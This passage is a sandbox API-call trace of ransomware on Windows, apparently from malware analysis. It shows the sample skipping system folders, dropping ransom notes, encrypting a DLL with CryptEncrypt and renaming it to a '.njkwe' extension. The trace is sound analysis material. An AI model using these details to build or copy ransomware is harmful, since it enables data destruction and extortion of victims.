pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\.") returned 74 [0073.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.493] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.493] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.493] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.493] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.493] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.493] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.493] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\..") returned 75 [0073.493] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.493] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.493] FindClose (in: hFindFile=0xc1a0e0 | out: hFindFile=0xc1a0e0) returned 1 [0073.493] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 104 [0073.493] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\applicationviewsrootnode\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.494] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.495] CloseHandle (hObject=0x434) returned 1 [0073.495] GetProcessHeap () returned 0xbe0000 [0073.495] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.495] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 0 [0073.495] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0073.495] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 79 [0073.495] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.495] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.496] CloseHandle (hObject=0x430) returned 1 [0073.496] GetProcessHeap () returned 0xbe0000 [0073.496] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.496] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Views", cAlternateFileName="")) returned 0 [0073.496] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0073.496] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 73 [0073.496] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.497] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.498] CloseHandle (hObject=0x42c) returned 1 [0073.498] GetProcessHeap () returned 0xbe0000 [0073.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.498] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd7af95c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0073.498] lstrcmpiW (lpString1="IdentityCRL", lpString2="Windows") returned -1 [0073.498] lstrcmpiW (lpString1="IdentityCRL", lpString2="$Recycle.bin") returned 1 [0073.498] lstrcmpiW (lpString1="IdentityCRL", lpString2="System Volume Information") returned -1 [0073.498] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files") returned -1 [0073.498] lstrcmpiW (lpString1="IdentityCRL", lpString2="Program Files (x86)") returned -1 [0073.498] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned 40 [0073.498] lstrcmpW (lpString1="IdentityCRL", lpString2=".") returned 1 [0073.498] lstrcmpW (lpString1="IdentityCRL", lpString2="..") returned 1 [0073.498] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.498] GetProcessHeap () returned 0xbe0000 [0073.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.498] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*") returned 42 [0073.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd7af95c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0073.498] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.498] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.498] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.498] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.498] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.498] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\.") returned 42 [0073.499] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.499] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd7af95c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.499] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.499] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.499] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.499] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.499] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.499] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\..") returned 43 [0073.499] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.499] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.499] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd7b0839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8b18c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="INT", cAlternateFileName="")) returned 1 [0073.499] lstrcmpiW (lpString1="INT", lpString2="Windows") returned -1 [0073.499] lstrcmpiW (lpString1="INT", lpString2="$Recycle.bin") returned 1 [0073.499] lstrcmpiW (lpString1="INT", lpString2="System Volume Information") returned -1 [0073.499] lstrcmpiW (lpString1="INT", lpString2="Program Files") returned -1 [0073.499] lstrcmpiW (lpString1="INT", lpString2="Program Files (x86)") returned -1 [0073.499] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT") returned 44 [0073.499] lstrcmpW (lpString1="INT", lpString2=".") returned 1 [0073.499] lstrcmpW (lpString1="INT", lpString2="..") returned 1 [0073.499] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.499] GetProcessHeap () returned 0xbe0000 [0073.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.499] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\*") returned 46 [0073.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd7b0839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8b18c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0073.500] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.500] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.500] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.500] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.500] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.500] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\.") returned 46 [0073.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.500] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd7b0839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8b18c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.500] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.500] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.500] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.500] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.500] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\..") returned 47 [0073.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.500] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5ed1465, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5ed1465, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x62e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0073.500] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="Windows") returned -1 [0073.500] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="$Recycle.bin") returned 1 [0073.500] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="System Volume Information") returned -1 [0073.500] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="Program Files") returned -1 [0073.500] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="Program Files (x86)") returned -1 [0073.500] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll") returned 63 [0073.500] StrStrIW (lpFirst="ppcrlconfig600.dll", lpSrch=".njkwe") returned 0x0 [0073.500] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.500] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2="taridd") returned -1 [0073.500] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.501] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.501] GetTickCount () returned 0x1152bbf [0073.501] GetTickCount () returned 0x1152bbf [0073.501] GetTickCount () returned 0x1152bbf [0073.501] GetTickCount () returned 0x1152bbf [0073.501] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.501] GetProcessHeap () returned 0xbe0000 [0073.501] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.501] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.504] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.504] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.505] GetProcessHeap () returned 0xbe0000 [0073.505] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.505] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.505] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0073.505] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0073.505] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0073.505] CloseHandle (hObject=0x434) returned 1 [0073.505] GetProcessHeap () returned 0xbe0000 [0073.505] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.505] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll_r00t_{3sXlE5}.njkwe") returned 83 [0073.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll_r00t_{3sxle5}.njkwe")) returned 1 [0073.506] GetProcessHeap () returned 0xbe0000 [0073.506] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.506] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5ed1465, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5ed1465, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x62e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 0 [0073.506] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0073.506] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 76 [0073.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\INT\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\int\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.506] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.507] CloseHandle (hObject=0x430) returned 1 [0073.507] GetProcessHeap () returned 0xbe0000 [0073.507] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.507] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x46b00d5c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x46b00d5c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="production", cAlternateFileName="PRODUC~1")) returned 1 [0073.507] lstrcmpiW (lpString1="production", lpString2="Windows") returned -1 [0073.507] lstrcmpiW (lpString1="production", lpString2="$Recycle.bin") returned 1 [0073.507] lstrcmpiW (lpString1="production", lpString2="System Volume Information") returned -1 [0073.507] lstrcmpiW (lpString1="production", lpString2="Program Files") returned -1 [0073.507] lstrcmpiW (lpString1="production", lpString2="Program Files (x86)") returned -1 [0073.507] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production") returned 51 [0073.507] lstrcmpW (lpString1="production", lpString2=".") returned 1 [0073.507] lstrcmpW (lpString1="production", lpString2="..") returned 1 [0073.507] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.507] GetProcessHeap () returned 0xbe0000 [0073.507] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.507] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\*") returned 53 [0073.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x46b00d5c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x46b00d5c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a3a0 [0073.508] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.508] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.508] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.508] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.508] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.508] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\.") returned 53 [0073.508] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.508] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x46b00d5c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x46b00d5c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.508] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.508] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.508] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.508] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.508] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.508] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\..") returned 54 [0073.508] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.508] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5ed1465, ftLastAccessTime.dwHighDateTime=0x1d2a02a, 